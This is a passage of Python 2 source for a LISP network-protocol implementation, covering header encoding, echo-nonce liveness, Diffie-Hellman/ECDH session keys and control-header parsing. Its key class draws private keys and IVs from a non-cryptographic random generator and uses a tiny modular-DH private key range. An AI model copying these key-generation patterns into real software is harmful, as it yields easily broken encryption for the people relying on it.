LISP_N_BIT = 0x80000000         # N: nonce present (see nonce())
LISP_L_BIT = 0x40000000         # L: locator-status-bits field in use
LISP_E_BIT = 0x20000000         # E: echo-nonce request
LISP_V_BIT = 0x10000000         # V: map-version present
LISP_I_BIT = 0x08000000         # I: instance-id present
LISP_P_BIT = 0x04000000         # P bit per header diagram above
LISP_K_BITS = 0x03000000        # KK: 2-bit crypto key-id, 0 = unencrypted
class lisp_data_header():
    """The 8-byte LISP data-plane encapsulation header.

    first_long holds the flag bits plus the 24-bit nonce/map-version
    field; second_long holds the 24-bit instance-id over the 8-bit
    locator-status-bits. Both are stored in host byte-order and
    converted on encode()/decode().
    """
    def __init__(self):
        self.first_long = 0
        self.second_long = 0
        self.k_bits = 0
    #enddef
    def print_header(self, e_or_d):
        """Return a printable summary of flags, nonce, and iid/lsb.
        e_or_d is an encap/decap label included in the output."""
        nonce_str = lisp_hex_string(self.first_long & 0xffffff)
        iid_lsb_str = lisp_hex_string(self.second_long).zfill(8)
        # Upper-case letter means the flag bit is set.
        flag_chars = []
        for bit, letter in zip([LISP_N_BIT, LISP_L_BIT, LISP_E_BIT,
            LISP_V_BIT, LISP_I_BIT, LISP_P_BIT], "nlevip"):
            flag_chars.append(letter.upper() if (self.first_long & bit) \
                else letter)
        #endfor
        flag_chars.append("K" if (self.k_bits in [2,3]) else "k")
        flag_chars.append("K" if (self.k_bits in [1,3]) else "k")
        line = ("{} LISP-header -> flags: {}{}{}{}{}{}{}{}, nonce: {}, " + \
            "iid/lsb: {}")
        return(line.format(bold(e_or_d, False), *(flag_chars +
            [nonce_str, iid_lsb_str])))
    #enddef
    def encode(self):
        """Pack the header into 8 network byte-order bytes."""
        return(struct.pack("II", socket.htonl(self.first_long),
            socket.htonl(self.second_long)))
    #enddef
    def decode(self, packet):
        """Unpack an 8-byte LISP header; returns True on success,
        False when the buffer is too short."""
        fmt = "II"
        fmt_size = struct.calcsize(fmt)
        if (len(packet) < fmt_size): return(False)
        fl, sl = struct.unpack(fmt, packet[:fmt_size])
        self.first_long = socket.ntohl(fl)
        self.second_long = socket.ntohl(sl)
        self.k_bits = (self.first_long & LISP_K_BITS) >> 24
        return(True)
    #enddef
    def key_id(self, key_id):
        """Install the 2-bit crypto key-id into the KK bits."""
        self.first_long = (self.first_long & ~(0x3 << 24)) | \
            ((key_id & 0x3) << 24)
        self.k_bits = key_id
    #enddef
    def nonce(self, nonce):
        """Set the N-bit and OR the nonce into the first long."""
        self.first_long |= (LISP_N_BIT | nonce)
    #enddef
    def map_version(self, version):
        """Set the V-bit and OR in the map-version number."""
        self.first_long |= (LISP_V_BIT | version)
    #enddef
    def instance_id(self, iid):
        """Set the I-bit and store the 24-bit instance-id; an iid of
        0 leaves the header untouched."""
        if (iid == 0): return
        self.first_long |= LISP_I_BIT
        self.second_long = (self.second_long & 0xff) | (iid << 8)
    #enddef
    def get_instance_id(self):
        """Return the 24-bit instance-id field."""
        return((self.second_long >> 8) & 0xffffff)
    #enddef
    def locator_status_bits(self, lsbs):
        """Set the L-bit and install the low 8 locator-status-bits."""
        self.first_long |= LISP_L_BIT
        self.second_long = (self.second_long & 0xffffff00) | (lsbs & 0xff)
    #enddef
    def is_request_nonce(self, nonce):
        """Nonzero when the request-nonce marker bit is set."""
        return(nonce & 0x80000000)
    #enddef
    def request_nonce(self, nonce):
        """Set E and N bits and the low 24 bits of a request-nonce."""
        self.first_long |= (LISP_E_BIT | LISP_N_BIT | (nonce & 0xffffff))
    #enddef
    def is_e_bit_set(self):
        """Nonzero when the echo-nonce-request bit is set."""
        return(self.first_long & LISP_E_BIT)
    #enddef
    def get_nonce(self):
        """Return the 24-bit nonce field."""
        return(self.first_long & 0xffffff)
    #enddef
#endclass
class lisp_echo_nonce():
    """Echo-nonce liveness state for one remote RLOC.

    An xTR sends data packets carrying a request-nonce (E-bit set);
    the remote xTR echoes the nonce back in its own data packets,
    proving the path is up in both directions. One instance exists per
    remote RLOC, registered in lisp_nonce_echo_list, and state is
    mirrored between the lisp-itr and lisp-etr processes via IPC.
    """
    def __init__(self, rloc_str):
        self.rloc_str = rloc_str
        self.rloc = lisp_address(LISP_AFI_NONE, rloc_str, 0, 0)
        self.request_nonce_sent = None
        self.echo_nonce_sent = None
        self.last_request_nonce_sent = None
        self.last_new_request_nonce_sent = None
        self.last_echo_nonce_sent = None
        self.last_new_echo_nonce_sent = None
        self.request_nonce_rcvd = None
        self.echo_nonce_rcvd = None
        self.last_request_nonce_rcvd = None
        self.last_echo_nonce_rcvd = None
        self.last_good_echo_nonce_rcvd = None
        # Register this instance so other code can look it up by RLOC.
        lisp_nonce_echo_list[rloc_str] = self
    #enddef
    def send_ipc(self, ipc_socket, ipc):
        """Send an IPC message to the peer lisp-itr/lisp-etr process."""
        source = "lisp-itr" if lisp_i_am_itr else "lisp-etr"
        dest = "lisp-etr" if lisp_i_am_itr else "lisp-itr"
        ipc = lisp_command_ipc(ipc, source)
        lisp_ipc(ipc, ipc_socket, dest)
    #enddef
    def send_request_ipc(self, ipc_socket, nonce):
        """Tell the peer process a request-nonce is outstanding."""
        nonce = lisp_hex_string(nonce)
        ipc = "nonce%R%{}%{}".format(self.rloc_str, nonce)
        self.send_ipc(ipc_socket, ipc)
    #enddef
    def send_echo_ipc(self, ipc_socket, nonce):
        """Tell the peer process an echo-nonce must be sent."""
        nonce = lisp_hex_string(nonce)
        ipc = "nonce%E%{}%{}".format(self.rloc_str, nonce)
        self.send_ipc(ipc_socket, ipc)
    #enddef
    def receive_request(self, ipc_socket, nonce):
        """Remote side asked us to echo nonce; record it and relay the
        request to the peer process (unless running as an RTR)."""
        old_nonce = self.request_nonce_rcvd
        self.request_nonce_rcvd = nonce
        self.last_request_nonce_rcvd = lisp_get_timestamp()
        if (lisp_i_am_rtr): return
        if (old_nonce != nonce): self.send_request_ipc(ipc_socket, nonce)
    #enddef
    def receive_echo(self, ipc_socket, nonce):
        """Remote side echoed a nonce; accept it only if it matches the
        request-nonce we are currently sending."""
        if (self.request_nonce_sent != nonce): return
        self.last_echo_nonce_rcvd = lisp_get_timestamp()
        if (self.echo_nonce_rcvd == nonce): return
        self.echo_nonce_rcvd = nonce
        if (lisp_i_am_rtr): return
        self.send_echo_ipc(ipc_socket, nonce)
    #enddef
    def get_request_or_echo_nonce(self, ipc_socket, remote_rloc):
        """Return the nonce to place in an outgoing data packet.

        Returns an echo-nonce (plain 24-bit value), a request-nonce
        (value with the high-order bit set, telling the caller to set
        the E-bit), or None when request-nonce mode should stop.
        """
        #
        # If we are in both request-nonce and echo-nonce mode, let the
        # higher IP addressed RLOC be in request mode.
        #
        if (self.request_nonce_sent and self.echo_nonce_sent and remote_rloc):
            local_rloc = lisp_myrlocs[0] if remote_rloc.is_ipv4() \
                else lisp_myrlocs[1]
            if (remote_rloc.address > local_rloc.address):
                a = "exit"
                self.request_nonce_sent = None
            else:
                a = "stay in"
                self.echo_nonce_sent = None
            #endif
            c = bold("collision", False)
            l = red(local_rloc.print_address_no_iid(), False)
            r = red(remote_rloc.print_address_no_iid(), False)
            lprint("Echo nonce {}, {} -> {}, {} request-nonce mode".format(c,
                l, r, a))
        #endif
        #
        # If we are echoing, return echo-nonce. Or get out of echo-nonce mode.
        #
        if (self.echo_nonce_sent != None):
            nonce = self.echo_nonce_sent
            e = bold("Echoing", False)
            lprint("{} nonce 0x{} to {}".format(e,
                lisp_hex_string(nonce), red(self.rloc_str, False)))
            self.last_echo_nonce_sent = lisp_get_timestamp()
            self.echo_nonce_sent = None
            return(nonce)
        #endif
        #endif
        #
        # Should we stop requesting nonce-echoing? Only do so if we received
        # a echo response and some time (10 seconds) has past.
        #
        nonce = self.request_nonce_sent
        last = self.last_request_nonce_sent
        if (nonce and last != None):
            if (time.time() - last >= LISP_NONCE_ECHO_INTERVAL):
                self.request_nonce_sent = None
                lprint("Stop request-nonce mode for {}, nonce 0x{}".format( \
                    red(self.rloc_str, False), lisp_hex_string(nonce)))
                return(None)
            #endif
        #endif
        #
        # Start echoing the nonce. Get a new nonce. If a echo-nonce is stored
        # use the same nonce as last time regardless if we received an echo
        # response. High-order bit set is telling caller to set the e-bit in
        # header.
        #
        if (nonce == None):
            nonce = lisp_get_data_nonce()
            if (self.recently_requested()): return(nonce)
            self.request_nonce_sent = nonce
            lprint("Start request-nonce mode for {}, nonce 0x{}".format( \
                red(self.rloc_str, False), lisp_hex_string(nonce)))
            self.last_new_request_nonce_sent = lisp_get_timestamp()
            #
            # Send the request-nonce to the ETR so it can tell us when the
            # other side has echoed this request-nonce.
            #
            if (lisp_i_am_itr == False): return(nonce | 0x80000000)
            self.send_request_ipc(ipc_socket, nonce)
        else:
            lprint("Continue request-nonce mode for {}, nonce 0x{}".format( \
                red(self.rloc_str, False), lisp_hex_string(nonce)))
        #endif
        #
        # Continue sending request-nonce. But if we never received an echo,
        # don't update timer.
        #
        self.last_request_nonce_sent = lisp_get_timestamp()
        return(nonce | 0x80000000)
    #enddef
    def request_nonce_timeout(self):
        """True when a request-nonce is outstanding, unechoed, and the
        echo interval has elapsed — i.e. the path may be down."""
        if (self.request_nonce_sent == None): return(False)
        if (self.request_nonce_sent == self.echo_nonce_rcvd): return(False)
        elapsed = time.time() - self.last_request_nonce_sent
        last_resp = self.last_echo_nonce_rcvd
        return(elapsed >= LISP_NONCE_ECHO_INTERVAL and last_resp == None)
    #enddef
    def recently_requested(self):
        """True when a request-nonce was sent within the interval."""
        last_resp = self.last_request_nonce_sent
        if (last_resp == None): return(False)
        elapsed = time.time() - last_resp
        return(elapsed <= LISP_NONCE_ECHO_INTERVAL)
    #enddef
    def recently_echoed(self):
        """True when the remote side echoed recently (or no request is
        outstanding, or a new request was just started)."""
        if (self.request_nonce_sent == None): return(True)
        #
        # Check how long its been since last received echo.
        #
        last_resp = self.last_good_echo_nonce_rcvd
        if (last_resp == None): last_resp = 0
        elapsed = time.time() - last_resp
        if (elapsed <= LISP_NONCE_ECHO_INTERVAL): return(True)
        #
        # If last received echo was a while ago and a new request-nonce was
        # sent recently, say the echo happen so we can bootstrap a new request
        # and echo exchange.
        #
        last_resp = self.last_new_request_nonce_sent
        if (last_resp == None): last_resp = 0
        elapsed = time.time() - last_resp
        return(elapsed <= LISP_NONCE_ECHO_INTERVAL)
    #enddef
    def change_state(self, rloc):
        """Move the RLOC between up and no-echoed-nonce states based on
        whether echoes have been received recently."""
        if (rloc.up_state() and self.recently_echoed() == False):
            down = bold("down", False)
            good_echo = lisp_print_elapsed(self.last_good_echo_nonce_rcvd)
            lprint("Take {} {}, last good echo: {}".format( \
                red(self.rloc_str, False), down, good_echo))
            rloc.state = LISP_RLOC_NO_ECHOED_NONCE_STATE
            rloc.last_state_change = lisp_get_timestamp()
            return
        #endif
        if (rloc.no_echoed_nonce_state() == False): return
        if (self.recently_requested() == False):
            up = bold("up", False)
            lprint("Bring {} {}, retry request-nonce mode".format( \
                red(self.rloc_str, False), up))
            rloc.state = LISP_RLOC_UP_STATE
            rloc.last_state_change = lisp_get_timestamp()
        #endif
    #enddef
    def print_echo_nonce(self):
        """Return a multi-line summary of nonce send/receive times for
        show-command output."""
        rs = lisp_print_elapsed(self.last_request_nonce_sent)
        er = lisp_print_elapsed(self.last_good_echo_nonce_rcvd)
        es = lisp_print_elapsed(self.last_echo_nonce_sent)
        rr = lisp_print_elapsed(self.last_request_nonce_rcvd)
        s = space(4)
        output = "Nonce-Echoing:\n"
        output += ("{}Last request-nonce sent: {}\n{}Last echo-nonce " + \
            "received: {}\n").format(s, rs, s, er)
        output += ("{}Last request-nonce received: {}\n{}Last echo-nonce " + \
            "sent: {}").format(s, rr, s, es)
        return(output)
    #enddef
#endclass
#
# lisp_keys
#
# Class to hold Diffie-Hellman keys. For ECDH use RFC5114 gx value of
# "192-bit Random ECP Group".
#
class lisp_keys():
    """Diffie-Hellman key state for one LISP crypto security session.

    Holds the local/remote public keys, the computed shared secret,
    and the derived encryption and ICV keys. Supports curve25519 ECDH
    (with AES-CBC, AES-GCM, or chacha20 ciphers) and a fallback
    1024-bit modular DH. Also encodes/decodes the Security Type LCAF
    used to carry public keys in Map-Requests/Map-Replies.
    """
    def __init__(self, key_id, do_curve=True, do_chacha=use_chacha,
        do_poly=use_poly):
        self.uptime = lisp_get_timestamp()
        self.last_rekey = None
        self.rekey_count = 0
        self.use_count = 0
        self.key_id = key_id
        self.cipher_suite = LISP_CS_1024
        self.dh_g_value = LISP_CS_1024_G
        self.dh_p_value = LISP_CS_1024_P
        self.curve25519 = None
        self.cipher_suite_string = ""
        if (do_curve):
            # Pick cipher suite: chacha20 if requested, else AES-GCM
            # when LISP_USE_AES_GCM is set, else AES-CBC.
            if (do_chacha):
                self.cipher_suite = LISP_CS_25519_CHACHA
                self.cipher_suite_string = "chacha"
            elif (os.getenv("LISP_USE_AES_GCM") != None):
                self.cipher_suite = LISP_CS_25519_GCM
                self.cipher_suite_string = "aes-gcm"
            else:
                self.cipher_suite = LISP_CS_25519_CBC
                self.cipher_suite_string = "aes-cbc"
            #endif
            self.local_private_key = random.randint(0, 2**128-1)
            key = lisp_hex_string(self.local_private_key).zfill(32)
            self.curve25519 = curve25519.Private(key)
        else:
            self.local_private_key = random.randint(0, 0x1fff)
        #endif
        self.local_public_key = self.compute_public_key()
        self.remote_public_key = None
        self.shared_key = None
        self.encrypt_key = None
        self.icv_key = None
        # ICV algorithm: poly1305 or truncated hmac-sha256.
        self.icv = poly1305 if do_poly else hashlib.sha256
        self.iv = None
        self.get_iv()
        self.do_poly = do_poly
    #enddef
    def copy_keypair(self, key):
        """Copy the local keypair from another lisp_keys instance."""
        self.local_private_key = key.local_private_key
        self.local_public_key = key.local_public_key
        self.curve25519 = key.curve25519
    #enddef
    def get_iv(self):
        """Return the next IV, packed to the width the cipher suite
        expects (8 bytes chacha, 12 bytes GCM, 16 bytes CBC).

        The IV starts random and is incremented per use so it never
        repeats under the same key.
        """
        if (self.iv == None):
            self.iv = random.randint(0, LISP_16_128_MASK)
        else:
            self.iv += 1
        #endif
        iv = self.iv
        if (self.cipher_suite == LISP_CS_25519_CHACHA):
            iv = struct.pack("Q", iv & LISP_8_64_MASK)
        elif (self.cipher_suite == LISP_CS_25519_GCM):
            ivh = struct.pack("I", (iv >> 64) & LISP_4_32_MASK)
            ivl = struct.pack("Q", iv & LISP_8_64_MASK)
            iv = ivh + ivl
        else:
            iv = struct.pack("QQ", iv >> 64, iv & LISP_8_64_MASK)
        return(iv)
    #enddef
    def key_length(self, key):
        """Return key length in bytes of a hex-encoded key."""
        if (type(key) != str): key = self.normalize_pub_key(key)
        return(len(key) / 2)
    #enddef
    def print_key(self, key):
        """Return an abbreviated "0xhhhh...hhhh(len)" key string."""
        k = self.normalize_pub_key(key)
        return("0x{}...{}({})".format(k[0:4], k[-4::], self.key_length(k)))
    #enddef
    def normalize_pub_key(self, key):
        """Return the public key as a hex string; accepts either a
        byte-string (curve25519) or an integer (modular DH)."""
        if (type(key) == str):
            if (self.curve25519): return(binascii.hexlify(key))
            return(key)
        #endif
        key = lisp_hex_string(key).zfill(256)
        return(key)
    #enddef
    def print_keys(self, do_bold=True):
        """Return a printable line of cipher suite and both pubkeys."""
        l = bold("local-key: ", False) if do_bold else "local-key: "
        if (self.local_public_key == None):
            l += "none"
        else:
            l += self.print_key(self.local_public_key)
        #endif
        r = bold("remote-key: ", False) if do_bold else "remote-key: "
        if (self.remote_public_key == None):
            r += "none"
        else:
            r += self.print_key(self.remote_public_key)
        #endif
        dh = "ECDH" if (self.curve25519) else "DH"
        cs = self.cipher_suite
        return("{} cipher-suite: {}, {}, {}".format(dh, cs, l, r))
    #enddef
    def compare_keys(self, keys):
        """True when DH parameters and remote pubkey match 'keys'."""
        if (self.dh_g_value != keys.dh_g_value): return(False)
        if (self.dh_p_value != keys.dh_p_value): return(False)
        if (self.remote_public_key != keys.remote_public_key): return(False)
        return(True)
    #enddef
    def compute_public_key(self):
        """Derive the local public key from the local private key."""
        if (self.curve25519): return(self.curve25519.get_public().public)
        key = self.local_private_key
        g = self.dh_g_value
        p = self.dh_p_value
        return(int((g**key) % p))
    #enddef
    def compute_shared_key(self, ed, print_shared=False):
        """Compute the DH/ECDH shared secret and derive the encrypt
        and ICV keys from it. ed is an "encap"/"decap" label used for
        logging only."""
        key = self.local_private_key
        remote_key = self.remote_public_key
        compute = bold("Compute {} shared-key".format(ed), False)
        lprint("{}, key-material: {}".format(compute, self.print_keys()))
        if (self.curve25519):
            public = curve25519.Public(remote_key)
            self.shared_key = self.curve25519.get_shared_key(public)
        else:
            p = self.dh_p_value
            self.shared_key = (remote_key**key) % p
        #endif
        #
        # This should only be used in a lab for debugging and never live since
        # its a security risk to expose the shared-key (even though the entire
        # key is not displayed).
        #
        if (print_shared):
            k = self.print_key(self.shared_key)
            lprint("Computed shared-key: {}".format(k))
        #endif
        #
        # Now compute keys we use for encryption and ICV authentication.
        #
        self.compute_encrypt_icv_keys()
        #
        # Increment counters and timestamp.
        #
        self.rekey_count += 1
        self.last_rekey = lisp_get_timestamp()
    #enddef
    def compute_encrypt_icv_keys(self):
        """Derive the 128-bit encryption key and the ICV key from the
        shared secret with HMAC-SHA256 (Python 2 'long' assumed)."""
        alg = hashlib.sha256
        if (self.curve25519):
            data = self.shared_key
        else:
            data = lisp_hex_string(self.shared_key)
        #endif
        #
        # context = "0001" || "lisp-crypto" || "<lpub> xor <rpub>" || "0100"
        #
        l = self.local_public_key
        if (type(l) != long): l = int(binascii.hexlify(l), 16)
        r = self.remote_public_key
        if (type(r) != long): r = int(binascii.hexlify(r), 16)
        context = "0001" + "lisp-crypto" + lisp_hex_string(l ^ r) + "0100"
        key_material = hmac.new(context, data, alg).hexdigest()
        key_material = int(key_material, 16)
        #
        # key-material = key-material-1-encrypt || key-material-2-icv
        #
        ek = (key_material >> 128) & LISP_16_128_MASK
        ik = key_material & LISP_16_128_MASK
        self.encrypt_key = lisp_hex_string(ek).zfill(32)
        # poly1305 keys are 32 hex digits, sha256-based ICV uses 40.
        fill = 32 if self.do_poly else 40
        self.icv_key = lisp_hex_string(ik).zfill(fill)
    #enddef
    def do_icv(self, packet, nonce):
        """Return the hex ICV for packet (poly1305 or truncated
        hmac-sha256 depending on configuration); "" when no key."""
        if (self.icv_key == None): return("")
        if (self.do_poly):
            poly = self.icv.poly1305aes
            hexlify = self.icv.binascii.hexlify
            nonce = hexlify(nonce)
            hash_output = poly(self.encrypt_key, self.icv_key, nonce, packet)
            hash_output = hexlify(hash_output)
        else:
            key = binascii.unhexlify(self.icv_key)
            hash_output = hmac.new(key, packet, self.icv).hexdigest()
            hash_output = hash_output[0:40]
        #endif
        return(hash_output)
    #enddef
    def add_key_by_nonce(self, nonce):
        """Store this key under a Map-Request nonce, indexed by key-id."""
        if (lisp_crypto_keys_by_nonce.has_key(nonce) == False):
            lisp_crypto_keys_by_nonce[nonce] = [None, None, None, None]
        #endif
        lisp_crypto_keys_by_nonce[nonce][self.key_id] = self
    #enddef
    def delete_key_by_nonce(self, nonce):
        """Remove all keys stored under a Map-Request nonce."""
        if (lisp_crypto_keys_by_nonce.has_key(nonce) == False): return
        lisp_crypto_keys_by_nonce.pop(nonce)
    #enddef
    def add_key_by_rloc(self, addr_str, encap):
        """Store this key under an RLOC address string, in the encap or
        decap table selected by 'encap'."""
        by_rlocs = lisp_crypto_keys_by_rloc_encap if encap else \
            lisp_crypto_keys_by_rloc_decap
        if (by_rlocs.has_key(addr_str) == False):
            by_rlocs[addr_str] = [None, None, None, None]
        #endif
        by_rlocs[addr_str][self.key_id] = self
        #
        # If "ipc-data-plane = yes" is configured, we need to tell the data-
        # plane from the lisp-etr process what the decryption key is.
        #
        if (encap == False):
            lisp_write_ipc_decap_key(addr_str, by_rlocs[addr_str])
        #endif
    #enddef
    def encode_lcaf(self, rloc_addr):
        """Return a Security Type LCAF encoding of the local public key
        (followed by rloc_addr when supplied)."""
        pub_key = self.normalize_pub_key(self.local_public_key)
        key_len = self.key_length(pub_key)
        sec_len = (6 + key_len + 2)
        if (rloc_addr != None): sec_len += rloc_addr.addr_length()
        packet = struct.pack("HBBBBHBB", socket.htons(LISP_AFI_LCAF), 0, 0,
            LISP_LCAF_SECURITY_TYPE, 0, socket.htons(sec_len), 1, 0)
        #
        # Put in cipher suite value. Support 1024-bit keys only. Then insert
        # key-length and public key material. Do not negotiate ECDH 25519
        # cipher suite if library not installed on system.
        #
        cs = self.cipher_suite
        packet += struct.pack("BBH", cs, 0, socket.htons(key_len))
        #
        # Insert public-key.
        #
        for i in range(0, key_len * 2, 16):
            key = int(pub_key[i:i+16], 16)
            packet += struct.pack("Q", byte_swap_64(key))
        #endfor
        #
        # Insert RLOC address.
        #
        if (rloc_addr):
            packet += struct.pack("H", socket.htons(rloc_addr.afi))
            packet += rloc_addr.pack_address()
        #endif
        return(packet)
    #enddef
    def decode_lcaf(self, packet, lcaf_len):
        """Parse a Security Type LCAF, storing the remote public key;
        returns the remaining packet or None on a malformed LCAF.

        When lcaf_len is 0 the LCAF header is parsed first (caller is
        lisp_map_request()); otherwise the header was already consumed
        (caller is lisp_rloc_record()).
        """
        #
        # Called by lisp_map_request().
        #
        if (lcaf_len == 0):
            packet_format = "HHBBH"
            format_size = struct.calcsize(packet_format)
            if (len(packet) < format_size): return(None)
            afi, rsvd, lcaf_type, rsvd, lcaf_len = struct.unpack( \
                packet_format, packet[:format_size])
            if (lcaf_type != LISP_LCAF_SECURITY_TYPE):
                packet = packet[lcaf_len + 6::]
                return(packet)
            #endif
            lcaf_len = socket.ntohs(lcaf_len)
            packet = packet[format_size::]
        #endif
        #
        # Fall through or called by lisp_rloc_record() when lcaf_len is
        # non-zero.
        #
        lcaf_type = LISP_LCAF_SECURITY_TYPE
        packet_format = "BBBBH"
        format_size = struct.calcsize(packet_format)
        if (len(packet) < format_size): return(None)
        key_count, rsvd, cs, rsvd, key_len = struct.unpack(packet_format,
            packet[:format_size])
        #
        # Advance packet pointer to beginning of key material. Validate there
        # is enough packet to pull the key out according the encoded key
        # length found earlier in the packet.
        #
        packet = packet[format_size::]
        key_len = socket.ntohs(key_len)
        if (len(packet) < key_len): return(None)
        #
        # Check Cipher Suites supported.
        #
        cs_list = [LISP_CS_25519_CBC, LISP_CS_25519_GCM, LISP_CS_25519_CHACHA,
            LISP_CS_1024]
        if (cs not in cs_list):
            lprint("Cipher-suites {} supported, received {}".format(cs_list,
                cs))
            packet = packet[key_len::]
            return(packet)
        #endif
        self.cipher_suite = cs
        #
        # Iterate to pull 8 bytes (64-bits) out at at time. The key is stored
        # internally as an integer.
        #
        pub_key = 0
        for i in range(0, key_len, 8):
            key = byte_swap_64(struct.unpack("Q", packet[i:i+8])[0])
            pub_key <<= 64
            pub_key |= key
        #endfor
        self.remote_public_key = pub_key
        #
        # Convert to 32-byte binary string. Make sure leading 0s are included.
        # ;-)
        #
        if (self.curve25519):
            key = lisp_hex_string(self.remote_public_key)
            key = key.zfill(64)
            new_key = ""
            for i in range(0, len(key), 2):
                new_key += chr(int(key[i:i+2], 16))
            #endfor
            self.remote_public_key = new_key
        #endif
        packet = packet[key_len::]
        return(packet)
    #enddef
#endclass
#
# lisp_thread()
#
# Used to multi-thread the data-plane.
#
class lisp_thread():
    """Per-thread context used to multi-thread the data-plane.

    One instance is handed to each pcap/worker thread so each thread
    has its own input queue, stats counters, and packet buffer.
    """
    def __init__(self, name):
        # Thread name string used for display/identification.
        self.thread_name = name
        self.thread_number = -1
        self.number_of_pcap_threads = 0
        self.number_of_worker_threads = 0
        # Queue feeding packets from pcap threads to worker threads.
        self.input_queue = Queue.Queue()
        self.input_stats = lisp_stats()
        # Reusable packet object to avoid per-packet allocation.
        self.lisp_packet = lisp_packet(None)
    #enddef
#endclass
#------------------------------------------------------------------------------
#
# The LISP fixed control header:
#
# 0 1 2 3
# 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# |Type=x | Reserved | Record Count |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Nonce . . . |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | . . . Nonce |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
class lisp_control_header():
    """Decoder for the fixed LISP control-message header.

    Parses the type field and the type-specific flag bits from the
    first 12 bytes (type/flags, reserved, record count, 64-bit nonce)
    of a LISP control message.
    """
    def __init__(self):
        self.type = 0
        self.record_count = 0
        self.nonce = 0
        self.rloc_probe = False
        self.smr_bit = False
        self.smr_invoked_bit = False
        self.ddt_bit = False
        self.to_etr = False
        self.to_ms = False
        self.info_reply = False
    #enddef
    def decode(self, packet):
        """Parse header fields from packet; True on success, False
        when the buffer is too short. Flags are interpreted per the
        message type."""
        fmt = "BBBBQ"
        fmt_size = struct.calcsize(fmt)
        if (len(packet) < fmt_size): return(False)
        typeval, bits, reserved, self.record_count, self.nonce = \
            struct.unpack(fmt, packet[:fmt_size])
        self.type = typeval >> 4
        # Only one type matches, so the chain below is exclusive.
        if (self.type == LISP_MAP_REQUEST):
            self.smr_bit = bool(typeval & 0x01)
            self.rloc_probe = bool(typeval & 0x02)
            self.smr_invoked_bit = bool(bits & 0x40)
        elif (self.type == LISP_ECM):
            self.ddt_bit = bool(typeval & 0x04)
            self.to_etr = bool(typeval & 0x02)
            self.to_ms = bool(typeval & 0x01)
        elif (self.type == LISP_NAT_INFO):
            self.info_reply = bool(typeval & 0x08)
        #endif
        return(True)
    #enddef
    def is_info_request(self):
        """True for a NAT-Info message that is not an Info-Reply."""
        return(self.type == LISP_NAT_INFO and self.is_info_reply() == False)
    #enddef
    def is_info_reply(self):
        """True when the Info-Reply flag was set."""
        return(bool(self.info_reply))
    #enddef
    def is_rloc_probe(self):
        """True when the Map-Request RLOC-probe bit was set."""
        return(bool(self.rloc_probe))
    #enddef
    def is_smr(self):
        """True when the Map-Request SMR bit was set."""
        return(bool(self.smr_bit))
    #enddef
    def is_smr_invoked(self):
        """True when the Map-Request SMR-invoked bit was set."""
        return(bool(self.smr_invoked_bit))
    #enddef
    def is_ddt(self):
        """True when the ECM DDT-originated bit was set."""
        return(bool(self.ddt_bit))
    #enddef
    def is_to_etr(self):
        """True when the ECM to-ETR bit was set."""
        return(bool(self.to_etr))
    #enddef
    def is_to_ms(self):
        """True when the ECM to-Map-Server bit was set."""
        return(bool(self.to_ms))
    #enddef
#endclass
#
# The Map-Register message format is:
#
# 0 1 2 3
# 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# |Type=3 |P|S|I| Reserved | kid |e|F|T|a|m|M| Record Count |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Nonce . . . |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | . . . Nonce |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Key ID | Algorithm ID | Authentication Data Length |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# ~ Authentication Data ~
# +-> +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | | Record TTL |
# | +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# R | Locator Count | EID mask-len | ACT |A| Reserved |
# e +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# c | Rsvd | Map-Version Number | EID-Prefix-AFI |
# o +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# r | EID-Prefix |
# d +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | /| Priority | Weight | M Priority | M Weight |
# | L +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | o | Unused Flags |L|p|R| Loc-AFI |
# | c +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | \| Locator |
# +-> +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | |
# | |
# +- ... xTR router-ID ... -+
# | |
# | |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | |
# +- ... xTR site-ID ... -+
# | |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
# kid is 1 of 8 values that describe the encryption key-id used for
# encrypting Map-Register messages. When the Map-Register is encrypted, the
# entire message, not including the first 4 bytes, is chacha20 encrypted. The
